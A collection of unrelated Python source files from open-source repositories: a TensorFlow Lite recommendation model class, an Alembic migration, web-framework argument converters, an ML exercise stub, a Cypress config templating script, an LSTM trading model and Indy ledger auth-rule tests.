from tensorflow_examples.lite.model_maker.core.data_util import recommendation_config
from tensorflow_examples.lite.model_maker.core.export_format import ExportFormat
from tensorflow_examples.lite.model_maker.core.task import custom_model
from tensorflow_examples.lite.model_maker.core.task import model_util
from tensorflow_examples.lite.model_maker.core.task.model_spec import recommendation_spec
from tensorflow_examples.lite.model_maker.third_party.recommendation.ml.model import input_pipeline
from tensorflow_examples.lite.model_maker.third_party.recommendation.ml.model import metrics as _metrics
from tensorflow_examples.lite.model_maker.third_party.recommendation.ml.model import recommendation_model_launcher as _launcher
@mm_export('recommendation.Recommendation')
class Recommendation(custom_model.CustomModel):
"""Recommendation task class."""
DEFAULT_EXPORT_FORMAT = (ExportFormat.TFLITE,)
ALLOWED_EXPORT_FORMAT = (ExportFormat.LABEL, ExportFormat.TFLITE,
ExportFormat.SAVED_MODEL)
# ID = 0 means a placeholder to OOV. Used for padding.
OOV_ID = 0
def __init__(self,
model_spec,
model_dir,
shuffle=True,
learning_rate=0.1,
gradient_clip_norm=1.0):
"""Init recommendation model.
Args:
model_spec: recommendation model spec.
model_dir: str, path to export model checkpoints and summaries.
shuffle: boolean, whether the training data should be shuffled.
learning_rate: float, learning rate.
gradient_clip_norm: float, clip threshold (<= 0 meaning no clip).
"""
if not isinstance(model_spec, recommendation_spec.RecommendationSpec):
raise ValueError(
'Expect RecommendationSpec but got model_spec: {}'.format(model_spec))
self._model_dir = model_dir
self._learning_rate = learning_rate
self._gradient_clip_norm = gradient_clip_norm
super(Recommendation, self).__init__(model_spec, shuffle=shuffle)
@property
def input_spec(self) -> recommendation_config.InputSpec:
return self.model_spec.input_spec
@property
def model_hparams(self) -> recommendation_config.ModelHParams:
return self.model_spec.model_hparams
def create_model(self, do_train=True):
"""Creates a model.
Args:
do_train: boolean. Whether to train the model.
Returns:
Keras model.
"""
self.model = self.model_spec.create_model()
if do_train:
_launcher.compile_model(self.model, self.model_hparams.eval_top_k,
self._learning_rate, self._gradient_clip_norm)
def train(self,
train_data,
validation_data=None,
batch_size=16,
steps_per_epoch=100,
epochs=1):
"""Feeds the training data for training.
Args:
train_data: Training dataset.
validation_data: Validation data. If None, skips validation process.
batch_size: int, the batch size.
steps_per_epoch: int, the step of each epoch.
epochs: int, number of epochs.
Returns:
History from model.fit().
"""
batch_size = batch_size if batch_size else self.model_spec.batch_size
train_ds = train_data.gen_dataset(
batch_size, is_training=True, shuffle=self.shuffle)
if validation_data:
validation_ds = validation_data.gen_dataset(batch_size, is_training=False)
else:
validation_ds = None
self.create_model(do_train=True)
history = self.model.fit(
x=train_ds,
validation_data=validation_ds,
steps_per_epoch=steps_per_epoch,
epochs=epochs,
callbacks=self._keras_callbacks(self._model_dir))
tf.get_logger().info(history)
return history
def evaluate(self, data, batch_size=10):
"""Evaluate the model.
Args:
data: Evaluation data.
batch_size: int, batch size for evaluation.
Returns:
History from model.evaluate().
"""
batch_size = batch_size if batch_size else self.model_spec.batch_size
eval_ds = data.gen_dataset(batch_size, is_training=False)
history = self.model.evaluate(eval_ds)
tf.get_logger().info(history)
return history
def _keras_callbacks(self, model_dir):
"""Returns a list of default keras callbacks for `model.fit`."""
return _launcher.get_callbacks(self.model, model_dir)
def _get_serve_fn(self, keras_model):
"""Gets serve fn for exporting model."""
input_specs = input_pipeline.get_serving_input_specs(self.input_spec)
return keras_model.serve.get_concrete_function(**input_specs)
def _export_tflite(self, tflite_filepath):
"""Exports tflite model."""
serve_fn = self._get_serve_fn(self.model)
# Providing trackable objects is now recommended since it will make the
# concrete function conversion API be based on the new SavedModel importer,
# which will enable new TensorFlow Lite features including variable support,
# resources and variant tensor, and signature concept.
if float('.'.join(tf.__version__.split('.')[:2])) >= 2.7:
converter = tf.lite.TFLiteConverter.from_concrete_functions([serve_fn],
self.model)
else:
converter = tf.lite.TFLiteConverter.from_concrete_functions([serve_fn])
tflite_model = converter.convert()
with tf.io.gfile.GFile(tflite_filepath, 'wb') as f:
f.write(tflite_model)
def _export_saved_model(self, filepath):
serve_fn = self._get_serve_fn(self.model)
signatures = {tf.saved_model.DEFAULT_SERVING_SIGNATURE_DEF_KEY: serve_fn}
tf.saved_model.save(self.model, export_dir=filepath, signatures=signatures)
def evaluate_tflite(self, tflite_filepath, data):
"""Evaluates the tflite model.
The data is padded to required length, and multiple metrics are evaluated.
Args:
tflite_filepath: File path to the TFLite model.
data: Data to be evaluated.
Returns:
Dict of (metric, value), evaluation result of TFLite model.
"""
label_name = self.input_spec.label_feature.feature_name
lite_runner = model_util.get_lite_runner(tflite_filepath, self.model_spec)
ds = data.gen_dataset(batch_size=1, is_training=False)
max_output_size = data.max_vocab_id + 1 # +1 because 0 is reserved for OOV.
eval_top_k = self.model_hparams.eval_top_k
metrics = [
_metrics.GlobalRecall(top_k=k, name=f'Global_Recall/Recall_{k}')
for k in eval_top_k
]
for feature, y_true in data_util.generate_elements(ds):
feature.pop(label_name)
x = feature
ids, scores = lite_runner.run(x)
# y_true: shape [1, 1]
# y_pred: shape [1, max_output_size]; fill only scores with top-k ids.
y_pred = np.zeros([1, max_output_size])
for i, score in zip(ids, scores):
if i in data.vocab: # Only set if id is in vocab.
y_pred[0, i] = score
# Update metrics.
for m in metrics:
m.update_state(y_true, y_pred)
result = collections.OrderedDict([(m.name, m.result()) for m in metrics])
return result
@classmethod
def create(cls,
train_data,
model_spec: recommendation_spec.RecommendationSpec,
model_dir: str = None,
validation_data=None,
batch_size: int = 16,
steps_per_epoch: int = 10000,
epochs: int = 1,
learning_rate: float = 0.1,
gradient_clip_norm: float = 1.0,
shuffle: bool = True,
do_train: bool = True):
"""Loads data and train the model for recommendation.
Args:
train_data: Training data.
model_spec: ModelSpec, Specification for the model.
model_dir: str, path to export model checkpoints and summaries.
validation_data: Validation data.
batch_size: Batch size for training.
steps_per_epoch: int, Number of step per epoch.
epochs: int, Number of epochs for training.
learning_rate: float, learning rate.
gradient_clip_norm: float, clip threshold (<= 0 meaning no clip).
shuffle: boolean, whether the training data should be shuffled.
do_train: boolean, whether to run training.
Returns:
An instance based on Recommendation.
"""
# Use model_dir or a temp folder to store intermediate checkpoints, etc.
if model_dir is None:
model_dir = tempfile.mkdtemp()
recommendation = cls(
model_spec,
model_dir=model_dir,
shuffle=shuffle,
learning_rate=learning_rate,
gradient_clip_norm=gradient_clip_norm)
if do_train:
tf.compat.v1.logging.info('Training recommendation model...')
recommendation.train(
train_data,
validation_data,
batch_size=batch_size,
steps_per_epoch=steps_per_epoch,
epochs=epochs)
else:
recommendation.create_model(do_train=False)
return recommendation
# Shortcut function.
create = Recommendation.create
mm_export('recommendation.create').export_constant(__name__, 'create')
|
migrations/versions/9d370f33f1a0_user_login_types.py | pombredanne/vulncode-db | 592 | 12748198 | <gh_stars>100-1000
"""user login types
Revision ID: 9d370f33f1a0
Revises: <KEY>
Create Date: 2020-11-30 12:58:31.046646
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import mysql
# revision identifiers, used by Alembic.
revision = "9d370f33f1a0"
down_revision = "<KEY>"
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column(
"user",
sa.Column(
"login_type",
sa.Enum("LOCAL", "GOOGLE", "GITHUB", name="logintype"),
nullable=True,
),
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column("user", "login_type")
# ### end Alembic commands ###
|
bocadillo/converters.py | teaglebuilt/bocadillo | 434 | 12748239 | <reponame>teaglebuilt/bocadillo
import decimal
import inspect
from datetime import date, datetime, time
from functools import wraps
import typing
import typesystem
FIELD_ALIASES: typing.Dict[typing.Type, typesystem.Field] = {
int: typesystem.Integer,
float: typesystem.Float,
bool: typesystem.Boolean,
decimal.Decimal: typesystem.Decimal,
date: typesystem.Date,
time: typesystem.Time,
datetime: typesystem.DateTime,
}
class PathConversionError(typesystem.ValidationError):
pass
class Converter:
__slots__ = ("func", "signature", "annotations", "required_params")
def __init__(self, func: typing.Callable):
self.func = func
self.signature = inspect.signature(self.func)
self.annotations: typing.Dict[str, typing.Type] = {
param.name: param.annotation
for param in self.signature.parameters.values()
if param.annotation is not inspect.Parameter.empty
}
self.required_params = set(
param.name
for param in self.signature.parameters.values()
if param.default is inspect.Parameter.empty
)
def convert(self, args: tuple, kwargs: dict) -> typing.Tuple[tuple, dict]:
bound: inspect.BoundArguments = self.signature.bind(*args, **kwargs)
errors: typing.List[typesystem.ValidationError] = []
for param_name, value in bound.arguments.items():
try:
annotation = self.annotations[param_name]
except KeyError:
continue
# Find the TypeSystem field for the parameter's annotation.
if isinstance(annotation, typesystem.Field):
field = annotation
else:
try:
field = FIELD_ALIASES[annotation]()
except KeyError:
continue
# Perform validation.
try:
value = field.validate(value)
except typesystem.ValidationError as exc:
# NOTE: `add_prefix` sets the key of the error in the final
# error's dict representation.
errors.extend(exc.messages(add_prefix=param_name))
else:
bound.arguments[param_name] = value
if errors:
raise PathConversionError(messages=errors)
# NOTE: apply defaults last to prevent validating the default values.
# It's faster and less bug-prone.
bound.apply_defaults()
return bound.args, bound.kwargs
class ViewConverter(Converter):
__slots__ = ("query_parameters",)
def __init__(self, func: typing.Callable):
super().__init__(func)
self.query_parameters = set(
param.name
for param in self.signature.parameters.values()
if param.default is not inspect.Parameter.empty
)
def get_query_params(self, args: tuple, kwargs: dict) -> dict:
raise NotImplementedError
def convert(self, args: tuple, kwargs: dict) -> typing.Tuple[tuple, dict]:
query_params = self.get_query_params(args, kwargs)
for param_name in self.query_parameters:
if param_name in query_params:
kwargs[param_name] = query_params[param_name]
return super().convert(args, kwargs)
def convert_arguments(
func: typing.Callable, converter_class: typing.Type[Converter]
) -> typing.Callable:
converter = converter_class(func)
@wraps(func)
async def converted(*args, **kwargs):
args, kwargs = converter.convert(args, kwargs)
return await func(*args, **kwargs)
return converted
|
machine-learning-ex7/ex7/computeCentroids.py | ShawnT4ever/coursera-ml-py | 1,333 | 12748242 | <filename>machine-learning-ex7/ex7/computeCentroids.py
import numpy as np
def compute_centroids(X, idx, K):
# Useful values
(m, n) = X.shape
# You need to return the following variable correctly.
centroids = np.zeros((K, n))
# ===================== Your Code Here =====================
# Instructions: Go over every centroid and compute mean of all points that
# belong to it. Concretely, the row vector centroids[i]
# should contain the mean of the data points assigned to
# centroid i.
#
# ==========================================================
return centroids
|
foundations_ui/cypress/fixtures/atlas_scheduler/envsubst.py | DeepLearnI/atlas | 296 | 12748254 | <reponame>DeepLearnI/atlas<filename>foundations_ui/cypress/fixtures/atlas_scheduler/envsubst.py
def _flattened_config_walk():
import os
import os.path as path
for dir_name, _, files in os.walk('cypress/fixtures/atlas_scheduler/.foundations'):
for file_name in files:
if file_name.endswith('.envsubst.yaml'):
yield path.join(dir_name, file_name)
def _config():
import os
import sys
import subprocess
for required_env in [
'CYPRESS_LOCAL_FOUNDATIONS_HOME',
'CYPRESS_SCHEDULER_IP',
'CYPRESS_SCHEDULER_FOUNDATIONS_HOME',
'CYPRESS_SCHEDULER_REDIS_PORT',
'CYPRESS_GUI_HOST',
'CYPRESS_GUI_PORT']:
if not os.environ.get(required_env, None):
print(f'Environment variable {required_env} is not set.')
sys.exit(1)
for template_file_name in _flattened_config_walk():
output_file_name = template_file_name[:-len('.envsubst.yaml')] + '.yaml'
subprocess.run(f'envsubst < {template_file_name} > {output_file_name}', shell=True)
_config()
|
DataFlow_Suite/lstm_exec.py | seenu037/algotrading | 200 | 12748256 | <filename>DataFlow_Suite/lstm_exec.py<gh_stars>100-1000
import tensorflow as tf
import numpy as np
import numpy.random as rng
import pandas.io.data as web
import numpy as np
import pandas as pd
def get_prices(symbol):
start, end = '2007-05-02', '2016-04-11'
data = web.DataReader(symbol, 'yahoo', start, end)
data=pd.DataFrame(data)
prices=data['Adj Close']
prices=prices.astype(float)
return prices
def get_returns(prices):
return ((prices-prices.shift(-1))/prices)[:-1]
def get_data(list):
l = []
for symbol in list:
rets = get_returns(get_prices(symbol))
l.append(rets)
return np.array(l).T
symbol_list = ['C', 'GS']
rets = get_data(symbol_list)
def lstm_iterator(raw_data, num_steps, data_size):
batch_size=1
raw_data = np.array(raw_data, dtype=np.float32)
data_len = len(raw_data)
batch_len = data_len // batch_size
data = np.zeros([batch_size, batch_len, data_size], dtype=np.float32)
for i in range(batch_size):
data[i] = raw_data[batch_len * i:batch_len * (i + 1),:]
epoch_size = (batch_len - 1) // num_steps
if epoch_size == 0:
raise ValueError("epoch_size == 0, decrease batch_size or num_steps")
for i in range(epoch_size):
x = data[:, i*num_steps:(i+1)*num_steps]
y = data[:, i*num_steps+1:(i+1)*num_steps+1]
yield (x[0], y[0])
class LSTMModel(object):
def __init__(self, num_steps, num_samples):#, config):
symbol_list = ['C', 'GS']
positions = tf.constant([-1,0,1]) #long, neutral or short
num_positions = 3
num_symbols = len(symbol_list)
self.num_samples = num_samples
self.num_steps = num_steps
#n_input = num_symbols * 100
hidden_size=21
n_classes = num_positions * num_symbols
#self.num_steps = tf.placeholder(tf.int64)
# define placeholders
self.inputs_ = tf.placeholder(tf.float32, [None, num_symbols])
self.targets_ = tf.placeholder(tf.float32, [None, num_symbols])
cell = tf.nn.rnn_cell.BasicLSTMCell(hidden_size, forget_bias=0.0, state_is_tuple=True)
#cell = tf.nn.rnn_cell.MultiRNNCell([cell] * config.num_layers)
cell = tf.nn.rnn_cell.InputProjectionWrapper(cell, num_symbols)
cell = tf.nn.rnn_cell.OutputProjectionWrapper(cell, n_classes)
outputs=[]
self.initial_state = cell.zero_state(1, tf.float32)
state = self.initial_state
time_step = 0
'''with tf.variable_scope("RNN"):
def body(x):
inp = self.inputs_[time_step,:]
inp = tf.reshape(inp, [1,-1])
(cell_output, state) = cell(inp, state)
outputs.append(cell_output)
return
def condition(x):
return tf.reduce_sum(x) < 100
tf.while_loop(condition, body, [x])'''
with tf.variable_scope("RNN"):
for time_step in range(self.num_steps): #####num_steps???
if time_step > 0: tf.get_variable_scope().reuse_variables()
inp = self.inputs_[time_step,:]
inp = tf.reshape(inp, [1,-1])
(cell_output, state) = cell(inp, state)
outputs.append(cell_output) #[6,]
self.final_state = state
y = tf.reshape(tf.concat(1, outputs), [-1, n_classes])
# loop through symbol, taking the columns for each symbol's bucket together
pos = {}
sample_n = {}
sample_mask = {}
symbol_returns = {}
relevant_target_column = {}
for i in range(num_symbols):
# isolate the buckets relevant to the symbol and get a softmax as well
symbol_probs = y[:,i*num_positions:(i+1)*num_positions]
symbol_probs_softmax = tf.nn.softmax(symbol_probs) # softmax[i, j] = exp(logits[i, j]) / sum(exp(logits[i]))
# sample probability to chose our policy's action
sample = tf.multinomial(tf.log(symbol_probs_softmax), num_samples)
for sample_iter in range(num_samples):
sample_n[i*num_samples + sample_iter] = sample[:,sample_iter]
pos[i*num_samples + sample_iter] = tf.reshape(sample_n[i*num_samples + sample_iter], [-1]) - 1
symbol_returns[i*num_samples + sample_iter] = tf.mul(
tf.cast(pos[i*num_samples + sample_iter], tf.float32),
self.targets_[:,i])
sample_mask[i*num_samples + sample_iter] = tf.cast(tf.reshape(tf.one_hot(sample_n[i*num_samples + sample_iter], 3), [-1,3]), tf.float32)
relevant_target_column[i*num_samples + sample_iter] = tf.reduce_sum(
symbol_probs * sample_mask[i*num_samples + sample_iter],1)
daily_returns_by_symbol_ = tf.concat(1, [tf.reshape(t, [-1,1]) for t in symbol_returns.values()])
daily_returns_by_symbol = tf.transpose(tf.reshape(daily_returns_by_symbol_, [-1,2,num_samples]), [0,2,1]) #[?,5,2]
daily_returns = tf.reduce_mean(daily_returns_by_symbol, 2) # [?,5]
total_return = tf.reduce_prod(daily_returns+1, 0)
z = tf.ones_like(total_return) * -1
self.total_return = total_return = tf.add(total_return, z)
ann_vol = tf.mul(
tf.sqrt(tf.reduce_mean(tf.pow((daily_returns - tf.reduce_mean(daily_returns, 0)),2),0)) ,
np.sqrt(252)
)
self.sharpe = tf.div(total_return, ann_vol)
#Maybe metric slicing later
#segment_ids = tf.ones_like(daily_returns[:,0])
#partial_prod = tf.segment_prod(daily_returns+1, segment_ids)
training_target_cols = tf.concat(1, [tf.reshape(t, [-1,1]) for t in relevant_target_column.values()])
ones = tf.ones_like(training_target_cols)
gradient_ = tf.nn.sigmoid_cross_entropy_with_logits(training_target_cols, ones)
gradient = tf.transpose(tf.reshape(gradient_, [-1,2,num_samples]), [0,2,1]) #[?,5,2]
#cost = tf.mul(gradient , daily_returns_by_symbol_reshaped)
#cost = tf.mul(gradient , tf.expand_dims(daily_returns, -1))
cost = tf.mul(gradient , tf.expand_dims(total_return, -1))
#cost = tf.mul(gradient , tf.expand_dims(sharpe, -1))
self.optimizer = tf.train.GradientDescentOptimizer(0.0001).minimize(cost)
self.costfn = tf.reduce_mean(cost)
def run_train_results(m, epoch):
state = m.initial_state.eval()
rs = rets[:-200]
full_feed = {m.inputs_: rs[:-1], m.targets_: rs[1:], m.initial_state: state}
t,s, c = session.run([ m.total_return, m.sharpe, m.costfn], feed_dict=full_feed)
t = np.mean(t)
s = np.mean(s)
print("Epoch:", '%04d' % (epoch+1), "cost=",c, "total return=", "{:.9f}".format(t),
"sharpe=", "{:.9f}".format(s))
return t
def run_test_results(m, epoch):
state = m.initial_state.eval()
rs = rets[-200:]
full_feed = {m.inputs_: rs[:-1], m.targets_: rs[1:], m.initial_state: state}
t,s, c = session.run([ m.total_return, m.sharpe, m.costfn], feed_dict=full_feed)
t = np.mean(t)
s = np.mean(s)
print("Epoch:", '%04d' % (epoch+1), "cost=",c, "total return=", "{:.9f}".format(t),
"sharpe=", "{:.9f}".format(s))
return t
def run_epoch(m, epoch):
full_feed = {m.inputs_: rets[:-1], m.targets_: rets[1:]}
state = m.initial_state.eval()
for step, (x, y) in enumerate(lstm_iterator(rets,20,2 )):
#m.num_steps = len(x)
feed_dict = {m.inputs_: x, m.targets_: y, m.initial_state: state}
_ , state = session.run([m.optimizer, m.final_state], feed_dict=feed_dict)
return
results = []
pos_results = []
with tf.Graph().as_default(), tf.Session() as session:
with tf.variable_scope("model", reuse=None):#, initializer=init):
m = LSTMModel(num_steps = 20, num_samples = 5)#, config=config)
with tf.variable_scope("model", reuse=True):#, initializer=init):
mvalid = LSTMModel(num_steps = len(rets[:-200]) -1, num_samples = 1)#, config=config)
with tf.variable_scope("model", reuse=True):#, initializer=init):
mtest = LSTMModel(num_steps = len(rets[-200:]) -1, num_samples = 1)
tf.initialize_all_variables().run()
for epoch in range(10):
run_epoch(m, epoch )
print('getting results...')
trt = run_train_results(mvalid, epoch)
print('trt')
ttt = run_test_results(mtest, epoch)
print('test: ',ttt)
results.append(ttt)
if trt>0:
pos_results.append(ttt)
print(np.mean(results))
print(np.mean(pos_results))
|
indy_common/test/auth/metadata/test_auth_rule_with_metadata_simple.py | Rob-S/indy-node | 627 | 12748270 | <reponame>Rob-S/indy-node
from indy_common.authorize.auth_constraints import AuthConstraint, IDENTITY_OWNER, AuthConstraintForbidden
from indy_common.constants import ENDORSER
from indy_common.test.auth.metadata.helper import validate, PLUGIN_FIELD, Action
from plenum.common.constants import TRUSTEE
MAX_SIG_COUNT = 3
def test_plugin_simple_rule_1_sig_owner_no_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, amount):
validate(
auth_constraint=AuthConstraint(role=IDENTITY_OWNER, sig_count=1, need_to_be_owner=True,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=IDENTITY_OWNER, endorser=None, sigs={IDENTITY_OWNER: s},
is_owner=True, amount=2, extra_sigs=False)
for s in range(1, MAX_SIG_COUNT + 1)
],
author=IDENTITY_OWNER, endorser=None,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_1_sig_owner_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, amount):
validate(
auth_constraint=AuthConstraint(role=IDENTITY_OWNER, sig_count=1, need_to_be_owner=True,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=IDENTITY_OWNER, endorser=ENDORSER, sigs={IDENTITY_OWNER: s1, ENDORSER: s2},
is_owner=True, amount=2, extra_sigs=True)
for s1 in range(1, MAX_SIG_COUNT + 1)
for s2 in range(1, MAX_SIG_COUNT + 1)
],
author=IDENTITY_OWNER, endorser=ENDORSER,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_1_sig_endorser_no_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, amount):
validate(
auth_constraint=AuthConstraint(role=ENDORSER, sig_count=1, need_to_be_owner=True,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=ENDORSER, endorser=None, sigs={ENDORSER: s},
is_owner=True, amount=2, extra_sigs=True)
for s in range(1, MAX_SIG_COUNT + 1)
],
author=ENDORSER, endorser=None,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_1_sig_endorser_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, amount):
validate(
auth_constraint=AuthConstraint(role=ENDORSER, sig_count=1, need_to_be_owner=True,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=ENDORSER, endorser=ENDORSER, sigs={ENDORSER: s},
is_owner=True, amount=2, extra_sigs=True)
for s in range(1, MAX_SIG_COUNT + 1)
],
author=ENDORSER, endorser=ENDORSER,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_1_sig_trustee_no_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, amount):
validate(
auth_constraint=AuthConstraint(role=ENDORSER, sig_count=1, need_to_be_owner=True,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=TRUSTEE, endorser=None, sigs={ENDORSER: s1, TRUSTEE: s2},
is_owner=True, amount=2, extra_sigs=True)
for s1 in range(1, MAX_SIG_COUNT + 1)
for s2 in range(1, MAX_SIG_COUNT + 1)
],
author=TRUSTEE, endorser=None,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_1_sig_trustee_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, amount):
validate(
auth_constraint=AuthConstraint(role=ENDORSER, sig_count=1, need_to_be_owner=True,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=TRUSTEE, endorser=ENDORSER, sigs={TRUSTEE: s2, ENDORSER: s3},
is_owner=True, amount=2, extra_sigs=True)
for s1 in range(1, MAX_SIG_COUNT + 1)
for s2 in range(1, MAX_SIG_COUNT + 1)
for s3 in range(1, MAX_SIG_COUNT + 1)
],
author=TRUSTEE, endorser=ENDORSER,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_1_sig_all_roles_owner_no_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, off_ledger_signature, amount):
validate(
auth_constraint=AuthConstraint(role='*', sig_count=1, need_to_be_owner=True,
off_ledger_signature=off_ledger_signature,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=IDENTITY_OWNER, endorser=None, sigs={IDENTITY_OWNER: s},
is_owner=True, amount=2, extra_sigs=False)
for s in range(1, MAX_SIG_COUNT + 1)
],
author=IDENTITY_OWNER, endorser=None,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_1_sig_all_roles_owner_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, off_ledger_signature, amount):
validate(
auth_constraint=AuthConstraint(role='*', sig_count=1, need_to_be_owner=True,
off_ledger_signature=off_ledger_signature,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=IDENTITY_OWNER, endorser=ENDORSER, sigs={IDENTITY_OWNER: s1, ENDORSER: s2},
is_owner=True, amount=2, extra_sigs=True)
for s1 in range(1, MAX_SIG_COUNT + 1)
for s2 in range(1, MAX_SIG_COUNT + 1)
],
author=IDENTITY_OWNER, endorser=ENDORSER,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_1_sig_all_roles_trustee_no_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, off_ledger_signature, amount):
validate(
auth_constraint=AuthConstraint(role='*', sig_count=1, need_to_be_owner=True,
off_ledger_signature=off_ledger_signature,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=TRUSTEE, endorser=None, sigs={TRUSTEE: s1},
is_owner=True, amount=2, extra_sigs=True)
for s1 in range(1, MAX_SIG_COUNT + 1)
],
author=TRUSTEE, endorser=None,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_1_sig_all_roles_trustee_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, off_ledger_signature, amount):
validate(
auth_constraint=AuthConstraint(role='*', sig_count=1, need_to_be_owner=True,
off_ledger_signature=off_ledger_signature,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=TRUSTEE, endorser=ENDORSER, sigs={TRUSTEE: s1, ENDORSER: s2},
is_owner=True, amount=2, extra_sigs=True)
for s1 in range(1, MAX_SIG_COUNT + 1)
for s2 in range(1, MAX_SIG_COUNT + 1)
],
author=TRUSTEE, endorser=ENDORSER,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_3_sig_trustee_no_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, amount):
validate(
auth_constraint=AuthConstraint(role=TRUSTEE, sig_count=3, need_to_be_owner=False,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=TRUSTEE, endorser=None, sigs={TRUSTEE: 3},
is_owner=owner, amount=2, extra_sigs=True)
for owner in [True, False]],
author=TRUSTEE, endorser=None,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_3_sig_trustee_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, amount):
validate(
auth_constraint=AuthConstraint(role=TRUSTEE, sig_count=3, need_to_be_owner=False,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=TRUSTEE, endorser=ENDORSER, sigs={TRUSTEE: 3, ENDORSER: s1},
is_owner=owner, amount=2, extra_sigs=True)
for s1 in range(1, MAX_SIG_COUNT + 1)
for owner in [True, False]
],
author=TRUSTEE, endorser=ENDORSER,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_3_sig_owner_no_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, amount):
validate(
auth_constraint=AuthConstraint(role=TRUSTEE, sig_count=3, need_to_be_owner=False,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[],
author=IDENTITY_OWNER, endorser=None,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_3_sig_owner_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, amount):
validate(
auth_constraint=AuthConstraint(role=TRUSTEE, sig_count=3, need_to_be_owner=False,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[
Action(author=IDENTITY_OWNER, endorser=ENDORSER, sigs={TRUSTEE: 3, IDENTITY_OWNER: s1, ENDORSER: s2},
is_owner=owner, amount=2, extra_sigs=True)
for s1 in range(1, MAX_SIG_COUNT + 1)
for s2 in range(1, MAX_SIG_COUNT + 1)
for owner in [True, False]
],
author=IDENTITY_OWNER, endorser=ENDORSER,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_0_sig_owner_no_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, off_ledger_signature, amount):
validate(
auth_constraint=AuthConstraint(role='*', sig_count=0, need_to_be_owner=False,
off_ledger_signature=off_ledger_signature,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[Action(author=IDENTITY_OWNER, endorser=None, sigs={},
is_owner=owner, amount=2, extra_sigs=False)
for owner in [True, False]] + [
Action(author=IDENTITY_OWNER, endorser=None, sigs={IDENTITY_OWNER: s},
is_owner=owner, amount=2, extra_sigs=False)
for owner in [True, False]
for s in range(1, MAX_SIG_COUNT + 1)],
author=IDENTITY_OWNER, endorser=None,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
def test_plugin_simple_rule_0_sig_owner_endorser(write_auth_req_validator, write_request_validation,
signatures, is_owner, off_ledger_signature, amount):
validate(
auth_constraint=AuthConstraint(role='*', sig_count=0, need_to_be_owner=False,
off_ledger_signature=off_ledger_signature,
metadata={PLUGIN_FIELD: 2}),
valid_actions=[Action(author=IDENTITY_OWNER, endorser=ENDORSER, sigs={ENDORSER: s},
is_owner=owner, amount=2, extra_sigs=True)
for s in range(1, MAX_SIG_COUNT + 1)
for owner in [True, False]],
author=IDENTITY_OWNER, endorser=ENDORSER,
all_signatures=signatures, is_owner=is_owner, amount=amount,
write_auth_req_validator=write_auth_req_validator,
write_request_validation=write_request_validation
)
